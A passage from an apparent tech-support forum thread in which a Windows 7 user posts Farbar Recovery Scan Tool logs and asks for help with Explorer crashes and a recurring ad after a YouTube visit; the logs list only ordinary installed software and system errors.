(HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)NVIDIA 3D Vision Controller Driver 340.50 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 340.50 - NVIDIA Corporation)NVIDIA 3D Vision Driver 340.52 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 340.52 - NVIDIA Corporation)NVIDIA Control Panel 340.52 (Version: 340.52 - NVIDIA Corporation) HiddenNVIDIA Graphics Driver 340.52 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 340.52 - NVIDIA Corporation)NVIDIA HD Audio Driver 1.3.30.1 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.30.1 - NVIDIA Corporation)NVIDIA Install Application (Version: 2.1002.160.1244 - NVIDIA Corporation) HiddenNVIDIA PhysX (x32 Version: 9.13.1220 - NVIDIA Corporation) HiddenNVIDIA PhysX System Software 9.13.1220 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.13.1220 - NVIDIA Corporation)NVIDIA Stereoscopic 3D Driver (x32 Version: 7.17.12.6514 - NVIDIA Corporation) HiddenPanda USB Vaccine 1.0.1.4 (HKLM-x32\...\{55A41219-9B22-4098-BAE7-AE289B3C569A}_is1) (Version: - Panda Security)Sound Blaster Z-Series (HKLM-x32\...\{143AECC2-5323-458C-8691-0F69277FE3B8}) (Version: 1.00.22 - Creative Technology Limited)Sound Blaster Z-Series Extras (HKLM-x32\...\{9D9DB4BA-E352-4AC8-AD2B-B10104F5AB80}) (Version: 1.0 - Creative Technology Limited)Spybot - Search & Destroy (HKLM-x32\...\{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1) (Version: 2.4.40 - Safer-Networking Ltd.)SQLite ADO.NET 2.0/3.5 Provider (HKLM-x32\...\{00257FA9-3622-45E4-8B4B-A792CC5169EB}) (Version: 1.066.0 - Phoenix Software Solutions, LLC)SUPERAntiSpyware (HKLM\...\{CDDCBBF1-2703-46BC-938B-BCC81A1EEAAA}) (Version: 6.0.1130 - SUPERAntiSpyware.com)WIDCOMM Bluetooth Software (HKLM\...\{A1439D4F-FD46-47F2-A1D3-FEE097C29A09}) (Version: 6.5.1.4700 - Broadcom Corporation) ==================== Custom CLSID (selected items): ========================== (If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.) ==================== Restore Points ========================= ==================== Hosts content: ========================== (If needed Hosts: directive could be included in the fixlist to reset Hosts.) 2009-07-13 21:34 - 2014-09-04 02:47 - 00000938 ____R C:\Windows\system32\Drivers\etc\hosts ==================== Scheduled Tasks (whitelisted) ============= (If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.) Task: {02249C66-258D-4757-A212-07A268F594A4} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-08-30] (Adobe Systems Incorporated)Task: {06E5E0FB-0173-4301-912E-8535F6FE21D6} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-06-12] (Google Inc.)Task: {897B0D21-5784-45BC-8F95-EB809D65F6BA} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-06-12] (Google Inc.)Task: {A9E11B3F-801F-4699-AFDF-4CA3C88B0EF1} - System32\Tasks\CCleanerSkipUAC => D:\Program Files\CCleaner\CCleaner.exe [2014-05-20] (Piriform Ltd)Task: {B86735F4-96F8-4F57-AF0C-D6FCF7261D3F} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => d:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exeTask: {BF642A3E-BF70-48F1-8DF9-912371AAEE98} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => d:\Program Files (x86)\Spybot - Search & Destroy 2\SDImmunize.exeTask: {CF83B4B5-0C07-4803-B9FC-E8741FF18B53} - System32\Tasks\Microsoft\Microsoft Antimalware\Microsoft Antimalware Scheduled Scan => c:\Program Files\Microsoft Security Client\MpCmdRun.exeTask: {E8A335FB-D8F4-4E40-9790-B43813824E92} - System32\Tasks\PandaUSBVaccine => d:\Program Files (x86)\Panda USB Vaccine\RunInteractiveWin.exe [2009-09-23] ()Task: {F44E16D8-6375-4C66-84BD-87AA869AD0CB} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => d:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exeTask: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exeTask: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exeTask: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exeTask: C:\Windows\Tasks\SUPERAntiSpyware Scheduled Task 138cf3f9-f67a-4f49-9f2a-da614f7f040b.job => d:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exeTask: C:\Windows\Tasks\SUPERAntiSpyware Scheduled Task 76f5f907-df54-4db7-8cca-e9da5ee3a2b2.job => d:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe ==================== Loaded Modules (whitelisted) ============= 2014-08-30 02:33 - 2014-07-02 13:55 - 00116568 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll2013-06-17 12:35 - 2013-06-17 12:35 - 00478400 _____ () C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\dblite.dll2013-05-08 14:52 - 2013-05-08 14:52 - 01270464 _____ () C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\kpcengine.2.3.dll2014-09-04 00:31 - 2014-05-13 12:04 - 00109400 _____ () d:\Program Files (x86)\Spybot - Search & Destroy 2\snlThirdParty150.bpl2014-09-04 00:31 - 2014-05-13 12:04 - 00416600 _____ () d:\Program Files (x86)\Spybot - Search & Destroy 2\DEC150.bpl2014-09-04 00:31 - 2014-05-13 12:04 - 00167768 _____ () d:\Program Files (x86)\Spybot - Search & Destroy 2\snlFileFormats150.bpl2014-09-04 00:31 - 2012-08-23 10:38 - 00574840 _____ () d:\Program Files (x86)\Spybot - Search & Destroy 2\sqlite3.dll2014-09-04 00:31 - 2012-04-03 17:06 - 00565640 _____ () d:\Program Files (x86)\Spybot - Search & Destroy 2\av\BDSmartDB.dll2014-09-04 00:31 - 2014-05-13 12:04 - 00109400 _____ () D:\Program Files (x86)\Spybot - Search & Destroy 2\snlThirdParty150.bpl2014-09-04 00:31 - 2014-05-13 12:04 - 00416600 _____ () D:\Program Files (x86)\Spybot - Search & Destroy 2\DEC150.bpl2014-09-04 00:31 - 2014-05-13 12:04 - 00167768 _____ () D:\Program Files (x86)\Spybot - Search & Destroy 2\snlFileFormats150.bpl2014-03-14 18:51 - 2012-06-07 22:34 - 00627216 _____ () C:\Program Files (x86)\CyberLink\Power2Go8\CLMediaLibrary.dll2012-06-08 13:34 - 2012-06-08 13:34 - 00016400 _____ () C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvcPS.dll2014-07-13 02:42 - 2013-09-16 12:17 - 01242584 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\ACE.dll ==================== Alternate Data Streams (whitelisted) ========= (If an entry is included in the fixlist, only the Alternate Data Streams will be removed.) ==================== Safe Mode (whitelisted) =================== (If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.) ==================== EXE Association (whitelisted) ============= (If an entry is included in the fixlist, the default will be restored. None default entries will be removed.) ==================== MSCONFIG/TASK MANAGER disabled items ========= (Currently there is no automatic fix for this section.) ==================== Faulty Device Manager Devices ============= Name: Microsoft Virtual WiFi Miniport AdapterDescription: Microsoft Virtual WiFi Miniport AdapterClass Guid: {4d36e972-e325-11ce-bfc1-08002be10318}Manufacturer: MicrosoftService: vwifimpProblem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: Bluetooth USB moduleDescription: Bluetooth USB moduleClass Guid: {e0cbf06c-cd8b-4647-bb8a-263b43f0f974}Manufacturer: BroadcomService: BTHUSBProblem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. ==================== Event log errors: ========================= Application errors:==================Error: (09/04/2014 07:54:17 PM) (Source: Application Error) (EventID: 1000) (User: )Description: Faulting application name: Explorer.EXE, version: 6.1.7601.17567, time stamp: 0x4d672ee4Faulting module name: SHELL32.dll, version: 6.1.7601.18517, time stamp: 0x53aa2e07Exception code: 0xc0000005Fault offset: 0x0000000000050506Faulting process id: 0x4f0Faulting application start time: 0xExplorer.EXE0Faulting application path: Explorer.EXE1Faulting module path: Explorer.EXE2Report Id: Explorer.EXE3 Error: (09/04/2014 07:49:17 PM) (Source: Application Error) (EventID: 1000) (User: )Description: Faulting application name: nvstreamsvc.exe, version: 0.0.0.0, time stamp: 0x53e5680cFaulting module name: nvstreamsvc.exe, version: 0.0.0.0, time stamp: 0x53e5680cException code: 0x40000015Fault offset: 0x00000000002d6389Faulting process id: 0xec8Faulting application start time: 0xnvstreamsvc.exe0Faulting application path: nvstreamsvc.exe1Faulting module path: nvstreamsvc.exe2Report Id: nvstreamsvc.exe3 Error: (09/04/2014 07:37:49 PM) (Source: Application Error) (EventID: 1000) (User: )Description: Faulting application name: Explorer.EXE, version: 6.1.7601.17567, time stamp: 0x4d672ee4Faulting module name: SHELL32.dll, version: 6.1.7601.18517, time stamp: 0x53aa2e07Exception code: 0xc0000005Fault offset: 0x0000000000050506Faulting process id: 0x788Faulting application start time: 0xExplorer.EXE0Faulting application path: Explorer.EXE1Faulting module path: Explorer.EXE2Report Id: Explorer.EXE3 System errors:=============Error: (09/04/2014 07:53:02 PM) (Source: Service Control Manager) (EventID: 7026) (User: )Description: The following boot-start or system-start driver(s) failed to load: ASMTFilter Error: (09/04/2014 04:56:48 PM) (Source: Service Control Manager) (EventID: 7026) (User: )Description: The following boot-start or system-start driver(s) failed to load: ASMTFilter Microsoft Office Sessions:=========================Error: (09/04/2014 07:54:17 PM) (Source: Application Error) (EventID: 1000) (User: )Description: Explorer.EXE6.1.7601.175674d672ee4SHELL32.dll6.1.7601.1851753aa2e07c000000500000000000505064f001cfc8a3bc597043C:\Windows\Explorer.EXEC:\Windows\system32\SHELL32.dll292de5b7-3497-11e4-b8e5-60a44c65b479 Error: (09/04/2014 07:49:17 PM) (Source: Application Error) (EventID: 1000) (User: )Description: nvstreamsvc.exe0.0.0.053e5680cnvstreamsvc.exe0.0.0.053e5680c4000001500000000002d6389ec801cfc88b204d3989C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exeC:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe7651211f-3496-11e4-8c64-60a44c65b479 Error: (09/04/2014 07:37:49 PM) (Source: Application Error) (EventID: 1000) (User: )Description: Explorer.EXE6.1.7601.175674d672ee4SHELL32.dll6.1.7601.1851753aa2e07c0000005000000000005050678801cfc88b2125e65dC:\Windows\Explorer.EXEC:\Windows\system32\SHELL32.dlldc48b880-3494-11e4-8c64-60a44c65b479 CodeIntegrity Errors:=================================== Date: 2014-09-04 01:21:21.524 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\ELAMBKUP\klelam.sys because the set of per-page image hashes could not be found on the system. Date: 2014-09-04 01:21:21.524 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\ELAMBKUP\klelam.sys because the set of per-page image hashes could not be found on the system. Date: 2014-09-04 01:21:21.524 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\ELAMBKUP\klelam.sys because the set of per-page image hashes could not be found on the system. Date: 2014-09-04 01:21:21.514 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\ELAMBKUP\klelam.sys because the set of per-page image hashes could not be found on the system. Date: 2014-09-04 01:21:21.514 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\ELAMBKUP\klelam.sys because the set of per-page image hashes could not be found on the system. Date: 2014-09-04 01:21:21.514 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\ELAMBKUP\klelam.sys because the set of per-page image hashes could not be found on the system. Date: 2014-09-04 01:21:21.514 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\KLELAMX64\klelam.sys because the set of per-page image hashes could not be found on the system. Date: 2014-09-04 01:21:21.514 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\KLELAMX64\klelam.sys because the set of per-page image hashes could not be found on the system. Date: 2014-09-04 01:21:21.514 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\KLELAMX64\klelam.sys because the set of per-page image hashes could not be found on the system. Date: 2014-09-03 05:56:04.608 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\ELAMBKUP\klelam.sys because the set of per-page image hashes could not be found on the system. ==================== Memory info =========================== Processor: Intel® Core i7-4770K CPU @ 3.50GHzPercentage of memory in use: 9%Total physical RAM: 32705.79 MBAvailable physical RAM: 29691.33 MBTotal Pagefile: 40895.96 MBAvailable Pagefile: 37362.27 MBTotal Virtual: 8192 MBAvailable Virtual: 8191.82 MB ==================== Drives ================================ Drive c: (Windows 7) (Fixed) (Total:447.13 GB) (Free:393.85 GB) NTFS ==>[Drive with boot components (obtained from BCD)]Drive d: (dATa) (Fixed) (Total:3725.9 GB) (Free:3720.37 GB) NTFS ==================== MBR & Partition Table ================== ========================================================Disk: 0 (MBR Code: Windows 7 or 8) (Size: 447.1 GB) (Disk ID: 7AEC82DA)Partition 1: (Active) - (Size=447.1 GB) - (Type=07 NTFS) ========================================================Disk: 1 (Size: 3726 GB) (Disk ID: C3C47305) Partition: GPT Partition Type. ==================== End Of Log ============================
  21. I am not able to detect malware of any kind with my AV/malware scans or malware bytes even with chameleon and yet windows explorer continually crashes when I access the file delete or edit /cut/paste edit menu. also when I attempt to delete files beneath recycle bin in left menu of "my computer" window. My cable repair man had gone to youtube through my computer to test the connection speed after he repaired my cable box, he clicked a video on youtube that was a double-click add then left. When I checked later my "Spybot" had caught it, but only to have it return when I used "hitman PRO" I caught it once, thought it was gone, then ran it again later and it caught it again. Kaspersky Internet security also launches adds when I launch the Kaspersky Internet Security program to check for updates, I do not now if this is a legit add or not but it has to do with "winning $25000 with Mensa IQ" asks for date of birth ect. Wanted to determine if it was legit. Mainly concerned with the explorer.exe crash when editing my files. Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 03-09-2014 02Ran by Matthew Daubenspeck (administrator) on MDAUB113886 on 04-09-2014 20:06:43Running from D:\Google Chrome DownloadsPlatform: Windows 7 Ultimate Service Pack 1 (X64) OS Language: English (United States)Internet Explorer Version 11Boot Mode: Normal The only official download link for FRST:Download link for 32-Bit version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/81/ Download link for 64-Bit Version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/ Download link from any site other than Bleeping Computer is unpermitted or outdated.See tutorial for FRST: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe(Creative Technology Ltd) C:\Program Files (x86)\Creative\Shared Files\CTAudSvc.exe(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe(Microsoft Corporation) C:\Windows\System32\wlanext.exe(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe(SUPERAntiSpyware.com) D:\Program Files\SUPERAntiSpyware\SASCore64.exe(Kaspersky Lab ZAO) C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\avp.exe(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe(Creative Technology Ltd) C:\Windows\SysWOW64\CtHdaSvc.exe(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe(Malwarebytes Corporation) D:\Program Files (x86)\Malwarebytes Anti-Exploit\mbae-svc.exe(Malwarebytes Corporation) D:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe(SUPERAntiSpyware) D:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe(Malwarebytes Corporation) D:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe(Malwarebytes Corporation) D:\Program Files (x86)\Malwarebytes Anti-Exploit\mbae.exe(Intel Corporation) C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe(Safer-Networking Ltd.) D:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe(Safer-Networking Ltd.) D:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe(Malwarebytes Corporation) D:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.24.15\GoogleCrashHandler.exe(CyberLink) C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.24.15\GoogleCrashHandler64.exe(Kaspersky Lab ZAO) C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\avpui.exe(Panda Security) D:\Program Files (x86)\Panda USB Vaccine\USBVaccine.exe(Safer-Networking Ltd.) D:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe(Safer-Networking Ltd.) D:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe ==================== Registry (Whitelisted) ================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM-x32\...\Run: [Malwarebytes Anti-Exploit] => d:\Program Files (x86)\Malwarebytes Anti-Exploit\mbae.exe [382608 2014-06-04] (Malwarebytes Corporation)HKLM-x32\...\Run: [uSB3MON] => C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [292848 2014-08-23] (Intel Corporation)HKLM-x32\...\Run: [updReg] => C:\Windows\UpdReg.EXE [90112 2000-05-11] (Creative Technology Ltd.)HKLM-x32\...\Run: [sound Blaster Z-Series Control Panel] => C:\Program Files (x86)\Creative\Sound Blaster Z-Series\Sound Blaster Z-Series Control Panel\SBZ.exe [735744 2013-02-27] (Creative Technology Ltd)HKLM-x32\...\Run: [sDTray] => d:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe [4101576 2014-06-24] (Safer-Networking Ltd.)HKLM-x32\...\Run: [CLVirtualDrive] => C:\Program Files (x86)\CyberLink\Power2Go8\VirtualDrive.exe [491120 2012-08-14] (CyberLink Corp.)HKLM-x32\...\Run: [CLMLServer_For_P2G8] => C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe [111120 2012-06-07] (CyberLink)HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2014-05-08] (Adobe Systems Incorporated)Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]HKU\S-1-5-21-4128547857-1153469887-4159291576-1001\...\Run: [sUPERAntiSpyware] => d:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe [7762712 2014-08-14] (SUPERAntiSpyware)HKU\S-1-5-21-4128547857-1153469887-4159291576-1001\...\Run: [Power2GoExpress8] => NALsa: [Notification Packages] scecli C:\Program Files\WIDCOMM\Bluetooth Software\BtwProximityCP.dll ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blankHKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-usHKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0x8E16F0879864CA01HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blankHKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blankBHO: Content Blocker Plugin -> {5564CC73-EFA7-4CBF-918A-5CF7FBBFFF4F} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\x64\IEExt\ContentBlocker\ie_content_blocker_plugin.dll (Kaspersky Lab ZAO)BHO: Virtual Keyboard Plugin -> {73455575-E40C-433C-9784-C78DC7761455} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\x64\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll (Kaspersky Lab ZAO)BHO: Safe Money Plugin -> {9E6D0D23-3D72-4A94-AE1F-2D167624E3D9} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\x64\IEExt\OnlineBanking\online_banking_bho.dll (Kaspersky Lab ZAO)BHO: URL Advisor Plugin -> {E33CF602-D945-461A-83F0-819F76A199F8} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\x64\IEExt\UrlAdvisor\klwtbbho.dll (Kaspersky Lab ZAO)BHO-x32: Content Blocker Plugin -> {5564CC73-EFA7-4CBF-918A-5CF7FBBFFF4F} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\IEExt\ContentBlocker\ie_content_blocker_plugin.dll (Kaspersky Lab ZAO)BHO-x32: Virtual Keyboard Plugin -> {73455575-E40C-433C-9784-C78DC7761455} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll (Kaspersky Lab ZAO)BHO-x32: Safe Money Plugin -> {9E6D0D23-3D72-4A94-AE1F-2D167624E3D9} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\IEExt\OnlineBanking\online_banking_bho.dll (Kaspersky Lab ZAO)BHO-x32: URL Advisor Plugin -> {E33CF602-D945-461A-83F0-819F76A199F8} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\IEExt\UrlAdvisor\klwtbbho.dll (Kaspersky Lab ZAO)DPF: HKLM-x32 {D27CDB6E-AE6D-11CF-96B8-444553540000} http://fpdownload2.macromedia.com/get/flashplayer/current/swflash.cabDPF: HKLM-x32 {D4B68B83-8710-488B-A692-D74B50BA558E} http://ccfiles.creative.com/Web/softwareupdate/ocx/15113/CTPIDPDE.cabDPF: HKLM-x32 {F6ACF75C-C32C-447B-9BEF-46B766368D29} http://ccfiles.creative.com/Web/softwareupdate/ocx/130321/CTPID.cabTcpip\Parameters: [DhcpNameServer] 192.168.1.254Tcpip\..\Interfaces\{5CEF61EB-1D9E-408E-AEA8-94B322F57FB5}: [NameServer] 208.67.222.222 FireFox:========FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_14_0_0_145.dll ()FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_14_0_0_145.dll ()FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)FF Plugin-x32: @microsoft.com/GENUINE -> disabled No FileFF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll (NVIDIA Corporation)FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll (NVIDIA Corporation)FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)FF HKLM-x32\...\Firefox\Extensions: [url_advisor@kaspersky.com] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\url_advisor@kaspersky.comFF Extension: 卡巴斯基網址顧問 - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\url_advisor@kaspersky.com [2014-06-12]FF HKLM-x32\...\Firefox\Extensions: [virtual_keyboard@kaspersky.com] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\virtual_keyboard@kaspersky.comFF Extension: 虛擬鍵盤 - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\virtual_keyboard@kaspersky.com [2014-06-12]FF HKLM-x32\...\Firefox\Extensions: [content_blocker@kaspersky.com] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\content_blocker@kaspersky.comFF Extension: 惡意網站攔截器 - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\content_blocker@kaspersky.com [2014-06-12]FF HKLM-x32\...\Firefox\Extensions: [anti_banner@kaspersky.com] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\anti_banner@kaspersky.comFF Extension: Chặn quảng cáo - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\anti_banner@kaspersky.com [2014-06-12]FF HKLM-x32\...\Firefox\Extensions: [online_banking@kaspersky.com] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\online_banking@kaspersky.comFF Extension: Safe Money - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\online_banking@kaspersky.com [2014-06-12] Chrome: =======CHR HomePage: Default -> CHR Profile: C:\Users\Matthew Daubenspeck\AppData\Local\Google\Chrome\User Data\DefaultCHR Extension: (Google Drive) - C:\Users\Matthew Daubenspeck\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-06-12]CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Matthew Daubenspeck\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-06-12]CHR Extension: (Kaspersky Protection) - C:\Users\Matthew Daubenspeck\AppData\Local\Google\Chrome\User Data\Default\Extensions\blbkdnmdcafmfhinpmnlhhddbepgkeaa [2014-06-12]CHR Extension: (YouTube) - C:\Users\Matthew Daubenspeck\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-06-12]CHR Extension: (Google Search) - C:\Users\Matthew Daubenspeck\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-06-12]CHR Extension: (Kaspersky URL Advisor) - C:\Users\Matthew Daubenspeck\AppData\Local\Google\Chrome\User Data\Default\Extensions\dchlnpcodkpfdpacogkljefecpegganj [2014-06-12]CHR Extension: (Google Wallet) - C:\Users\Matthew Daubenspeck\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-06-12]CHR Extension: (Gmail) - C:\Users\Matthew Daubenspeck\AppData\Local\Google\Chrome\User 